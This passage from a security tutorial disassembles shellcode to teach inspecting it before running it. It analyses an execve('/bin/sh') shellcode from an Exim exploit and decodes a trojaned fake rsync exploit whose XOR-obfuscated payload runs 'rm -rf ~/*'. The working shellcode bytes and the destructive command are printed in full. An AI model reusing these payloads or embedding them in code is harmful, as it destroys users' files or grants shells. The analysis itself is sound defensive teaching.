One last point that deserves attention is the importance of disassembling shellcodes, both to learn new techniques and to be sure about what they do before executing them.
For instance, let's take a look at the shellcode from the exploit published by Rafael San Miguel Carrasco for a local buffer overflow vulnerability in the Exim MTA (releases 4.40 through 4.43).
static char shellcode[]=
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";
Let's disassemble it with ndisasm; by now, we expect to see something familiar:
$ echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"\
> "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"\
> "\x2f\x73\x68\x58" | ndisasm -u -
00000000  EB17              jmp short 0x19       ; Initial jump to the CALL
00000002  5E                pop esi              ; Store the address of the string in ESI
00000003  897608            mov [esi+0x8],esi    ; Write the address of the string in ESI + 8
00000006  31C0              xor eax,eax          ; Zero out EAX
00000008  884607            mov [esi+0x7],al     ; Null-terminate the string
0000000B  89460C            mov [esi+0xc],eax    ; Write the null pointer to ESI + 12
0000000E  B00B              mov al,0xb           ; Number of the execve(2) syscall
00000010  89F3              mov ebx,esi          ; Store the address of the string in EBX (first argument)
00000012  8D4E08            lea ecx,[esi+0x8]    ; Second argument (pointer to the array)
00000015  31D2              xor edx,edx          ; Zero out EDX (third argument)
00000017  CD80              int 0x80             ; Execute the syscall
00000019  E8E4FFFFFF        call 0x2             ; Push the address of the string and jump to the second instruction
0000001E  2F                das                  ; "/bin/shX"
0000001F  62696E            bound ebp,[ecx+0x6e]
00000022  2F                das
00000023  7368              jnc 0x8d
00000025  58                pop eax
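The two branch targets in this listing follow from simple arithmetic on the displacement bytes, and the same arithmetic locates the embedded string. As a minimal sketch (Python 3 is assumed here, and the helper names jmp_short_target and call_near_target are made up for the illustration, they are not part of the exploit), the targets can be recomputed without executing anything:

```python
import struct

# First shellcode from the text, as raw bytes (it is only inspected, never run).
shellcode = (
    b"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    b"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    b"\x2f\x73\x68\x58"
)


def jmp_short_target(code, offset):
    """Target of a 2-byte `jmp short` (opcode EB + signed 8-bit displacement)."""
    assert code[offset] == 0xEB
    (rel8,) = struct.unpack_from("<b", code, offset + 1)
    return offset + 2 + rel8  # displacement is relative to the next instruction


def call_near_target(code, offset):
    """Target and return address of a 5-byte `call` (opcode E8 + signed 32-bit displacement)."""
    assert code[offset] == 0xE8
    (rel32,) = struct.unpack_from("<i", code, offset + 1)
    return_address = offset + 5  # this is what the CALL pushes on the stack
    return return_address + rel32, return_address


call_offset = jmp_short_target(shellcode, 0)
pop_offset, string_offset = call_near_target(shellcode, call_offset)

print(hex(call_offset), hex(pop_offset), hex(string_offset))
print(shellcode[string_offset:])
```

The return address pushed by the CALL is the offset of the first byte after it, which is exactly where the string "/bin/shX" sits; that is why the POP ESI at offset 0x2 ends up holding the address of the string.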
It's always a good habit to examine a shellcode before executing it. For example, on 28 May 2004, a prankster posted on full-disclosure what he claimed was a public exploit for an rsync vulnerability. However, the code was odd: after a first, well-commented shellcode came a second, less visible one:
[...]
char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";
[...]
On top of that, after a brief look at the main() of the exploit, it was easy to spot that the latter shellcode was executed locally:
(long) funct = &shellcode2;
[...]
funct();
Therefore, if we want to know what the shellcode actually does, we have no choice but to disassemble it:
$ echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8[...]" | ndisasm -u -
00000000  EB10              jmp short 0x12       ; Jump to the CALL
00000002  5E                pop esi              ; Retrieve the address of byte 0x17
00000003  31C9              xor ecx,ecx          ; Zero out ECX
00000005  B14B              mov cl,0x4b          ; Set up the loop counter (see instruction 0x0E)
00000007  B0FF              mov al,0xff          ; Set up the XOR mask
00000009  3006              xor [esi],al         ; XOR byte 0x17 with AL
0000000B  FEC8              dec al               ; Decrease the XOR mask
0000000D  46                inc esi              ; Load the address of the next byte
0000000E  E2F9              loop 0x9             ; Keep XORing until ECX=0
00000010  EB05              jmp short 0x17       ; Jump to the first XORed instruction
00000012  E8EBFFFFFF        call 0x2             ; Push the address of the next byte and jump to the second instruction
00000017  17                pop ss
[...]
As you can see, it's a self-modifying shellcode: the 0x4B (75) bytes starting at offset 0x17 are decoded at run time by XORing each one with the value of AL (initially 0xFF, then decremented at each loop iteration). Once decoded, they are executed (jmp short 0x17). So let's try to understand which instructions will actually be executed. We can easily decode the shellcode using our beloved Python:
#!/usr/bin/env python
# Python 2 script (it uses the print statement): decode the XORed part of the shellcode.

sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
     "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
     "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
     "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
     "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
     "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
     "\x7b\x35"

# Byte i of the encoded part (offset 0x17 onwards) is XORed with 0xff - i,
# which is the value AL holds at iteration i of the decoder loop.
print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
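The one-liner above is Python 2. As a hedged alternative for Python 3, the sketch below replays the decoder stub register by register on a copy of the bytes, so that each line can be matched against the disassembly. The function name run_decoder_stub and its parameters are illustrative and do not come from the exploit; the shellcode itself is never executed.

```python
sc = (
    b"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    b"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    b"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    b"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    b"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    b"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    b"\x7b\x35"
)


def run_decoder_stub(code, start=0x17, count=0x4B, key=0xFF):
    """Replay the XOR loop (offsets 0x09 to 0x0E) on a writable copy of `code`."""
    mem = bytearray(code)
    esi, ecx, al = start, count, key  # pop esi / mov cl,0x4b / mov al,0xff
    while ecx != 0:
        mem[esi] ^= al                # xor [esi],al
        al = (al - 1) & 0xFF          # dec al (8-bit register)
        esi += 1                      # inc esi
        ecx -= 1                      # loop 0x9: decrement ECX, repeat while non-zero
    return bytes(mem[start:start + count])


decoded = run_decoder_stub(sc)
print(len(decoded))
print(decoded)
```

To pipe the result into hexdump or ndisasm, the last line can be swapped for sys.stdout.buffer.write(decoded) (after importing sys), which emits the raw bytes rather than their printable representation and does not append a newline.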
hexdump can already give us a first idea:
$ ./decode.py | hexdump -C
00000000  e8 25 00 00 00 2f 62 69  6e 2f 73 68 00 73 68 00  |è%.../bin/sh.sh.|
00000010  2d 63 00 72 6d 20 2d 72  66 20 7e 2f 2a 20 32 3e  |-c.rm -rf ~/* 2>|
00000020  2f 64 65 76 2f 6e 75 6c  6c 00 5d 31 c0 50 8d 5d  |/dev/null.]1ÀP.]|
00000030  0e 53 8d 5d 0b 53 8d 5d  08 53 89 eb 89 e1 31 d2  |.S.].S.].S.ë.á1Ó|
00000040  b0 0b cd 80 89 c3 31 c0  40 cd 80                 |°.Í..Ã1À@Í.|
0000004c
Mmmh... "/bin/sh", "sh -c rm -rf ~/* 2>/dev/null"... This doesn't look good... But let's disassemble it to be sure!
$ ./decode.py | ndisasm -u -
00000000  E825000000        call 0x2a
00000005  2F                das
00000006  62696E            bound ebp,[ecx+0x6e]
00000009  2F                das
0000000A  7368              jnc 0x74
0000000C  007368            add [ebx+0x68],dh
0000000F  002D6300726D      add [0x6d720063],ch
00000015  202D7266207E      and [0x7e206672],ch
0000001B  2F                das
0000001C  2A20              sub ah,[eax]
0000001E  323E              xor bh,[esi]
00000020  2F                das
00000021  6465762F          gs jna 0x54
00000025  6E                outsb
00000026  756C              jnz 0x94
00000028  6C                insb
00000029  005D31            add [ebp+0x31],bl
[...]
The first instruction is a CALL, immediately followed by the strings displayed by hexdump. The beginning of the shellcode could be re-written this way:
E825000000                                        call 0x2a
2F62696E2F736800                                  db "/bin/sh"
736800                                            db "sh"
2D6300                                            db "-c"
726D202D7266207E2F2A20323E2F6465762F6E756C6C00    db "rm -rf ~/* 2>/dev/null"
5D                                                pop ebp
[...]
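The code reached by the CALL addresses these strings by their distance from the return address that the CALL pushes. As a small Python 3 sketch (the variable names are illustrative, and the bytes are simply the first 0x2b decoded bytes copied from the hexdump), the CALL target and the offset of each NUL-terminated string can be recomputed like this:

```python
import struct

# First 0x2b bytes of the decoded payload, copied from the hexdump in the text.
decoded_head = bytes.fromhex(
    "e8250000002f62696e2f736800736800"
    "2d6300726d202d7266207e2f2a20323e"
    "2f6465762f6e756c6c005d"
)

# call rel32: the target is relative to the address of the next instruction,
# which is also the return address pushed on the stack.
(rel32,) = struct.unpack_from("<i", decoded_head, 1)
return_address = 5
call_target = return_address + rel32

# Everything between the return address and the CALL target is string data.
data = decoded_head[return_address:call_target]

layout = []
offset = 0
for chunk in data.split(b"\x00")[:-1]:  # drop the empty piece after the last NUL
    layout.append((offset, chunk.decode("ascii")))
    offset += len(chunk) + 1            # +1 for the terminating NUL byte

print(hex(call_target))
for off, text in layout:
    print(f"return address + {off:#x}: {text!r}")
```

The offsets obtained this way (0x0, 0x8, 0xb and 0xe) are the displacements to look for in the instructions that follow the POP.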
Let's examine the called function, keeping only the bytes from offset 0x2a (42) onwards (cut counts from 1, hence 43):
$ ./decode.py | cut -c 43- | ndisasm -u -
00000000  5D                pop ebp              ; Retrieve the address of the string "/bin/sh"
00000001  31C0              xor eax,eax          ; Zero out EAX
00000003  50                push eax             ; Push the null pointer onto the stack
00000004  8D5D0E            lea ebx,[ebp+0xe]    ; Store the address of "rm -rf ~/* 2>/dev/null" in EBX
00000007  53                push ebx             ; and push it onto the stack
00000008  8D5D0B            lea ebx,[ebp+0xb]    ; Store the address of "-c" in EBX
0000000B  53                push ebx             ; and push it onto the stack
0000000C  8D5D08            lea ebx,[ebp+0x8]    ; Store the address of "sh" in EBX
0000000F  53                push ebx             ; and push it onto the stack
00000010  89EB              mov ebx,ebp          ; Store the address of "/bin/sh" in EBX (first arg to execve())
00000012  89E1              mov ecx,esp          ; Copy the stack pointer to ECX (ESP points to the array "sh", "-c", "rm ...", NULL)
00000014  31D2              xor edx,edx          ; Third arg to execve()
00000016  B00B              mov al,0xb           ; Number of the execve() syscall
00000018  CD80              int 0x80             ; Execute the syscall
0000001A  89C3              mov ebx,eax          ; Reached only if execve() fails: copy its return value to EBX (exit status)
0000001C  31C0              xor eax,eax          ; Zero out EAX
0000001E  40                inc eax              ; EAX=1 (number of the exit() syscall)
0000001F  CD80              int 0x80             ; Execute the syscall
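As you can see, it's an execve(2) syscall with "/bin/sh" as the first argument and the array "sh", "-c", "rm -rf ~/* 2>/dev/null" as the second. In other words, the "exploit" recursively deletes the files in the home directory of whoever runs it and discards any error messages. Needless to say, you should always analyse a shellcode before executing it!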
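To make the argument passing explicit, here is a rough Python 3 model of the stack built by the four pushes. It is only a sketch under simplifying assumptions: the stack is a plain list, pointers are represented by their offsets from EBP, and the names push and c_string are made up for the illustration.

```python
# Data block that follows the CALL in the decoded payload (strings from the text).
data = b"/bin/sh\x00sh\x00-c\x00rm -rf ~/* 2>/dev/null\x00"


def c_string(buf, offset):
    """Read the NUL-terminated string that starts at `offset`."""
    end = buf.index(b"\x00", offset)
    return buf[offset:end].decode("ascii")


stack = []  # index 0 is the top of the stack, i.e. what ESP points to


def push(value):
    """The x86 stack grows downwards, so the last value pushed is the first one read."""
    stack.insert(0, value)


push(None)   # push eax (EAX = 0): NULL terminator of the argument array
push(0x0E)   # lea ebx,[ebp+0xe] / push ebx
push(0x0B)   # lea ebx,[ebp+0xb] / push ebx
push(0x08)   # lea ebx,[ebp+0x8] / push ebx

filename = c_string(data, 0)   # mov ebx,ebp: first argument of execve()
argv = []
for pointer in stack:          # mov ecx,esp: second argument, read until NULL
    if pointer is None:
        break
    argv.append(c_string(data, pointer))

print(filename, argv)
```

Pushing the pointers in reverse order is what leaves them in the usual argv order in memory, with ESP pointing at the entry for "sh" and the null pointer closing the array.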